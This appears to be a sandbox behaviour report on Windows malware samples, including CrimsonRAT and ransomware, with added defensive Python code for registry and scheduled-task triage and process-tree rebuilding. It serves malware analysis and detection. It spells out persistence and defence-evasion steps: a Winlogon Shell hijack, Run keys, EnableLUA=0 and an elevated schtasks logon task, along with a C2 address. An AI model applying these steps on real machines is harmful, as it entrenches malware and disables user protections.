Analysis
max time kernel: 400s
max time network: 402s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-08-2024 21:36
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Trojan
Resource: win10v2004-20240802-en
Errors
General
Target: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Trojan
Malware Config
Extracted
Family: crimsonrat
C2: 185.136.161.124
Signatures
CrimsonRAT main payload 1 IoCs
resource: behavioral1/files/0x00070000000234b4-415.dat
yara_rule: family_crimsonrat
CrimsonRat
Crimson RAT is a remote access trojan attributed to a Pakistan-linked threat actor.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes: reg.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe" (reg.exe)
Winlogon's Shell value normally holds explorer.exe; pointing it at a file under the user's profile makes that file the shell at every interactive logon.
Sets EnableLUA to 0 (User Account Control disabled) 1 IoCs
Processes: reg.exe
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
EnableLUA = 0 switches UAC off, so later elevations no longer show a consent prompt; the change takes effect after a reboot.
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 6 IoCs
Looks up the country code configured in the registry, likely a geofence.
Processes: CrimsonRAT.exe (6 instances)
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation (CrimsonRAT.exe, once per launch: PIDs 4656, 428, 2284, 1732, 540, 4476)
Executes dropped EXE 17 IoCs
Processes (pid, image):
1108 Alerta.exe
2540 Gas.exe
4656 CrimsonRAT.exe
2224 dlrarhsiva.exe
428 CrimsonRAT.exe
3528 dlrarhsiva.exe
2284 CrimsonRAT.exe
436 dlrarhsiva.exe
1732 CrimsonRAT.exe
1996 dlrarhsiva.exe
540 CrimsonRAT.exe
4476 CrimsonRAT.exe
4216 dlrarhsiva.exe
2100 dlrarhsiva.exe
920 $uckyLocker.exe
5088 7ev3n.exe
4820 system.exe
PID 920 also belongs to an earlier identity_helper.exe instance in the process tree, and PID 892 is likewise used twice; this trace reuses PIDs, so match on image name and launch order rather than on PID alone.
Adds Run key to start application 2 TTPs 2 IoCs
Processes: reg.exe, dlrarhsiva.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe" (reg.exe)
Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tbibra_dreb = "C:\\ProgramData\\Hdlharas\\dlrarhsiva.exe" (dlrarhsiva.exe)
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes: $uckyLocker.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\Desktop\Wallpaper = "0" ($uckyLocker.exe)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 23 IoCs
Attempts to gather information about the victim system's language in order to infer the geographical location of that host.
Processes: 7ev3n.exe, reg.exe, cmd.exe, shutdown.exe, Gas.exe, system.exe, Alerta.exe, $uckyLocker.exe, SCHTASKS.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, 23 times, by (in trace order): 7ev3n.exe, reg.exe, cmd.exe, shutdown.exe, Gas.exe, system.exe, cmd.exe, cmd.exe, reg.exe, reg.exe, Alerta.exe, cmd.exe, reg.exe, cmd.exe, $uckyLocker.exe, SCHTASKS.exe, cmd.exe, reg.exe, cmd.exe, reg.exe, cmd.exe, reg.exe, cmd.exe
The cmd.exe, reg.exe and SCHTASKS.exe hits come from the SysWOW64 copies launched by system.exe; opening this key is also part of ordinary 32-bit process start-up under WOW64, so on its own this signature is weak evidence of deliberate discovery.
Enumerates system info in registry 2 TTPs 3 IoCs
Processes: msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
Modifies data under HKEY_USERS 15 IoCs
Processes: LogonUI.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "126"
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"
All 15 are theme and DWM writes by LogonUI.exe, the Windows logon screen, not activity of the samples.
NTFS ADS 7 IoCs
Processes: 7ev3n.exe, msedge.exe
File created C:\Users\Admin\AppData\Local\system.exe:SmartScreen:$DATA (7ev3n.exe)
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 690237.crdownload:SmartScreen (msedge.exe)
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 174377.crdownload:SmartScreen (msedge.exe)
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 148651.crdownload:SmartScreen (msedge.exe)
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 899181.crdownload:SmartScreen (msedge.exe)
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 378450.crdownload:SmartScreen (msedge.exe)
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 559546.crdownload:SmartScreen (msedge.exe)
The six .crdownload:SmartScreen streams are written by msedge.exe on in-progress downloads; the entry that matters for the sample is the SmartScreen stream 7ev3n.exe created on its dropped copy, C:\Users\Admin\AppData\Local\system.exe.
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
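The Winlogon Shell, EnableLUA, Run key and scheduled-task entries above describe the persistence and defense evasion this chain sets up. As an added example, not from the report or from any sandbox vendor, the following Python evaluates events of that shape against a few triage rules. The event values are transcribed from the report's signature tables; the rule logic, the user-writable path list and the benign schtasks /query line are this example's own.

```python
# Added example: rule-based triage of registry-write and command-line events
# of the kind a sandbox report lists. Rules, names and thresholds are this
# example's own, not a sandbox vendor's signatures.
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class RegSet:
    process: str   # process that wrote the value
    key: str       # key path in the sandbox's native form (\REGISTRY\MACHINE\...)
    name: str      # value name
    data: str      # value data as printed, backslashes doubled


USER_WRITABLE = ("/users/", "/programdata/", "/appdata/", "/temp/")  # assumption: paths a standard user can write


def norm_key(key: str) -> str:
    """Lower-case, forward-slash key path with the hive prefix shortened."""
    k = key.lower().replace("\\", "/")
    k = re.sub(r"^/registry/user/s-1-5-21-[\d-]+", "hkcu", k)
    return k.replace("/registry/machine", "hklm", 1)


def norm_data(data: str) -> str:
    """Collapse the doubled backslashes the report prints, drop quotes, lower-case."""
    return data.replace("\\\\", "\\").strip('"').lower().replace("\\", "/")


def check_registry(ev: RegSet) -> list[str]:
    key, name, data = norm_key(ev.key), ev.name.lower(), norm_data(ev.data)
    findings = []
    if key.endswith("/winlogon") and name == "shell" and data != "explorer.exe":
        findings.append(f"{ev.process}: Winlogon Shell replaced with {data}")
    if key.endswith("/policies/system") and name == "enablelua" and data == "0":
        findings.append(f"{ev.process}: UAC disabled (EnableLUA = 0)")
    if key.endswith(("/currentversion/run", "/currentversion/runonce")):
        hive = "HKLM" if key.startswith("hklm") else "HKU"
        where = "user-writable" if any(p in data for p in USER_WRITABLE) else "protected"
        findings.append(f"{ev.process}: {hive} Run value '{ev.name}' -> {data} ({where} path)")
    return findings


def parse_schtasks(cmdline: str) -> dict:
    """Pull /SC, /TN, /TR and /RL out of a schtasks command line, honouring quotes."""
    toks = [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]
    args = {"create": any(t.lower() == "/create" for t in toks)}
    for i, t in enumerate(toks[:-1]):
        if t.upper() in ("/SC", "/TN", "/TR", "/RL"):
            args[t.upper()] = toks[i + 1]
    return args


def check_schtasks(cmdline: str) -> list[str]:
    a = parse_schtasks(cmdline)
    if not a["create"]:
        return []
    name, trigger = a.get("/TN", "?"), a.get("/SC", "").upper()
    action = norm_data(a.get("/TR", ""))
    findings = []
    if trigger in ("ONLOGON", "ONSTART") and a.get("/RL", "").upper() == "HIGHEST":
        findings.append(f"task '{name}' runs {action} elevated at {trigger.lower()}")
    if any(p in action for p in USER_WRITABLE):
        findings.append(f"task '{name}' action lives in a user-writable path")
    if action.endswith((".bat", ".cmd", ".vbs", ".js", ".ps1")):
        findings.append(f"task '{name}' action is a script, not a signed binary")
    return findings


def triage(reg_events, cmdlines) -> list[str]:
    out = []
    for ev in reg_events:
        out += check_registry(ev)
    for c in cmdlines:
        out += check_schtasks(c)
    return out


SID = r"\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000"
SAMPLE_REG = [  # transcribed from the report's signature tables
    RegSet("reg.exe", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon",
           "Shell", r"C:\\Users\\Admin\\AppData\\Local\\system.exe"),
    RegSet("reg.exe", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
           "EnableLUA", "0"),
    RegSet("reg.exe", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
           "System", r"C:\\Users\\Admin\\AppData\\Local\\system.exe"),
    RegSet("dlrarhsiva.exe", SID + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
           "tbibra_dreb", r"C:\\ProgramData\\Hdlharas\\dlrarhsiva.exe"),
    RegSet("$uckyLocker.exe", SID + r"\Control Panel\Desktop", "Wallpaper", "0"),
    RegSet("LogonUI.exe", r"\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM",
           "ColorizationColor", "3288365271"),
]
SAMPLE_CMD = [
    r'C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f',
    # constructed benign counterpart, not from the report
    r'schtasks.exe /query /TN "\Microsoft\Windows\Defrag\ScheduledDefrag"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_REG, SAMPLE_CMD):
        print(finding)
```

The wallpaper and LogonUI writes pass through without a finding, which is the point of keying rules on the specific key and value name rather than on "writes under HKEY_USERS"; the schtasks rule fires three times on the report's command because trigger, run level and action path each independently look wrong.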
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes (pid, image, hits): 1800 msedge.exe (2), 4276 msedge.exe (2), 920 identity_helper.exe (2), 3564 msedge.exe (2), 4548 msedge.exe (2), 4440 msedge.exe (2), 1580 msedge.exe (4), 4636 msedge.exe (2), 1680 msedge.exe (2)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
Processes: 4276 msedge.exe (all 12 IoCs)
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: shutdown.exe
Token: SeShutdownPrivilege (PID 2060, shutdown.exe)
Token: SeRemoteShutdownPrivilege (PID 2060, shutdown.exe)
Suspicious use of FindShellTrayWindow 64 IoCs
Processes: 4276 msedge.exe (all 64 IoCs)
Suspicious use of SendNotifyMessage 32 IoCs
Processes: 4276 msedge.exe (all 32 IoCs)
Suspicious use of SetWindowsHookEx 1 IoCs
Processes: 968 LogonUI.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes: msedge.exe
All 64 writes originate from PID 4276 (the msedge.exe browser process) into its own child processes: 2 into PID 1648 (crashpad-handler, procid_target 86), 2 into PID 1800 (network service, 88), and the remaining 60 into PID 3556 (gpu-process, 87) and PID 2720 (storage service, 89). This is the Chromium parent setting up its sandboxed children and is expected for Edge; none of the writes target a dropped sample.
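The WriteProcessMemory list above and the process tree that follows both key on PIDs, and this trace reuses two of them (892 and 920). As an added example, not part of the report, the Python below rebuilds the tree in launch order so that each PID resolves to the right instance and lineage questions ("which chain did reg.exe 2520 come from?") get a correct answer. The record list is transcribed from the tree below; the Proc type and the helper functions are this example's own.

```python
# Added example: rebuild a sandbox process tree in launch order so that a PID
# the OS has reused maps to the right instance. Records are transcribed from
# the report's process tree; the helpers are this example's own.
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Proc:
    seq: int                       # position in the trace; unique even when pid is not
    pid: int
    image: str
    parent: Optional["Proc"] = None
    children: list = field(default_factory=list)


def build_tree(records):
    """records: (pid, parent_pid, image) in the order the sandbox observed them.
    Returns (all instances in trace order, pids that were reused during the trace)."""
    live = {}                      # pid -> most recently started instance with that pid
    procs, reused = [], []
    for seq, (pid, ppid, image) in enumerate(records):
        parent = live.get(ppid) if ppid is not None else None
        if pid in live:
            reused.append(pid)     # an earlier instance had this pid; it must have exited
        p = Proc(seq, pid, image, parent)
        if parent:
            parent.children.append(p)
        live[pid] = p
        procs.append(p)
    return procs, reused


def lineage(p: Proc) -> list:
    """Ancestry from the root down to p, as image:pid."""
    chain = []
    while p:
        chain.append(f"{p.image}:{p.pid}")
        p = p.parent
    return chain[::-1]


def instances(procs, pid):
    """Every instance that carried this pid, in launch order."""
    return [p for p in procs if p.pid == pid]


def descendants(p: Proc) -> list:
    out = []
    for c in p.children:
        out.append(c)
        out += descendants(c)
    return out


TRACE = [  # (pid, parent pid, image); transcribed from the report's process tree
    (4276, None, "msedge.exe"),
    (1648, 4276, "msedge.exe"),          # crashpad-handler
    (3556, 4276, "msedge.exe"),          # gpu-process
    (1800, 4276, "msedge.exe"),          # network service
    (2720, 4276, "msedge.exe"),          # storage service
    (892, 4276, "identity_helper.exe"),
    (920, 4276, "identity_helper.exe"),
    (1108, 4276, "Alerta.exe"),
    (2540, 4276, "Gas.exe"),
    (892, 4276, "msedge.exe"),           # renderer: PID 892 reused
    (4656, 4276, "CrimsonRAT.exe"),
    (2224, 4656, "dlrarhsiva.exe"),
    (920, 4276, "$uckyLocker.exe"),      # PID 920 reused
    (5088, 4276, "7ev3n.exe"),
    (4820, 5088, "system.exe"),
    (1884, 4820, "cmd.exe"),
    (3396, 4820, "SCHTASKS.exe"),
    (4184, 4820, "cmd.exe"),
    (2520, 4184, "reg.exe"),
]

if __name__ == "__main__":
    procs, reused = build_tree(TRACE)
    print("reused pids:", reused)
    print(" -> ".join(lineage(procs[-1])))
```

Keying the parent lookup on the most recently started instance is what makes this robust: a tree built from a flat pid-to-ppid map would hang $uckyLocker.exe off whichever record for 920 happened to be stored last.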
Processes
-
Level 1: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Trojan
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID: 4276
Every sample below is a direct child of this browser process, i.e. it was run from the browser rather than by another sample; the Edge helper processes (crashpad, gpu, network, renderers, identity_helper, quarantine) sit at the same level and are not part of the infection chain.
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffafe8546f8,0x7ffafe854708,0x7ffafe8547182⤵PID:1648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:22⤵PID:3556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:82⤵PID:2720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:12⤵PID:2880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:12⤵PID:1228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:82⤵PID:892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5244 /prefetch:82⤵PID:1432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:12⤵PID:4912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6140 /prefetch:82⤵PID:2640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3564
-
-
Level 2: C:\Users\Admin\Downloads\Alerta.exe
Command line: "C:\Users\Admin\Downloads\Alerta.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID: 1108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:12⤵PID:3628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5068 /prefetch:82⤵PID:4916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6352 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4548
-
-
Level 2: C:\Users\Admin\Downloads\Gas.exe
Command line: "C:\Users\Admin\Downloads\Gas.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID: 2540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:12⤵PID:3784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5736 /prefetch:82⤵PID:3596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:12⤵PID:892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:12⤵PID:3160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3420 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:12⤵PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13124406764729668114,3916195544237708927,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:12⤵PID:2096
-
-
Level 2: C:\Users\Admin\Downloads\CrimsonRAT.exe
Command line: "C:\Users\Admin\Downloads\CrimsonRAT.exe"
- Checks computer location settings
- Executes dropped EXE
PID: 4656
Level 3: C:\ProgramData\Hdlharas\dlrarhsiva.exe
Command line: "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
- Executes dropped EXE
PID: 2224
-
-
-
Level 2: C:\Users\Admin\Downloads\CrimsonRAT.exe
Command line: "C:\Users\Admin\Downloads\CrimsonRAT.exe"
- Checks computer location settings
- Executes dropped EXE
PID: 428
Level 3: C:\ProgramData\Hdlharas\dlrarhsiva.exe
Command line: "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
- Executes dropped EXE
PID: 3528
-
-
-
Level 2: C:\Users\Admin\Downloads\CrimsonRAT.exe
Command line: "C:\Users\Admin\Downloads\CrimsonRAT.exe"
- Checks computer location settings
- Executes dropped EXE
PID: 2284
Level 3: C:\ProgramData\Hdlharas\dlrarhsiva.exe
Command line: "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
- Executes dropped EXE
PID: 436
-
-
-
Level 2: C:\Users\Admin\Downloads\CrimsonRAT.exe
Command line: "C:\Users\Admin\Downloads\CrimsonRAT.exe"
- Checks computer location settings
- Executes dropped EXE
PID: 1732
Level 3: C:\ProgramData\Hdlharas\dlrarhsiva.exe
Command line: "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
- Executes dropped EXE
- Adds Run key to start application
PID: 1996
-
-
-
Level 2: C:\Users\Admin\Downloads\CrimsonRAT.exe
Command line: "C:\Users\Admin\Downloads\CrimsonRAT.exe"
- Checks computer location settings
- Executes dropped EXE
PID: 540
Level 3: C:\ProgramData\Hdlharas\dlrarhsiva.exe
Command line: "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
- Executes dropped EXE
PID: 4216
-
-
-
Level 2: C:\Users\Admin\Downloads\CrimsonRAT.exe
Command line: "C:\Users\Admin\Downloads\CrimsonRAT.exe"
- Checks computer location settings
- Executes dropped EXE
PID: 4476
Level 3: C:\ProgramData\Hdlharas\dlrarhsiva.exe
Command line: "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
- Executes dropped EXE
PID: 2100
-
-
-
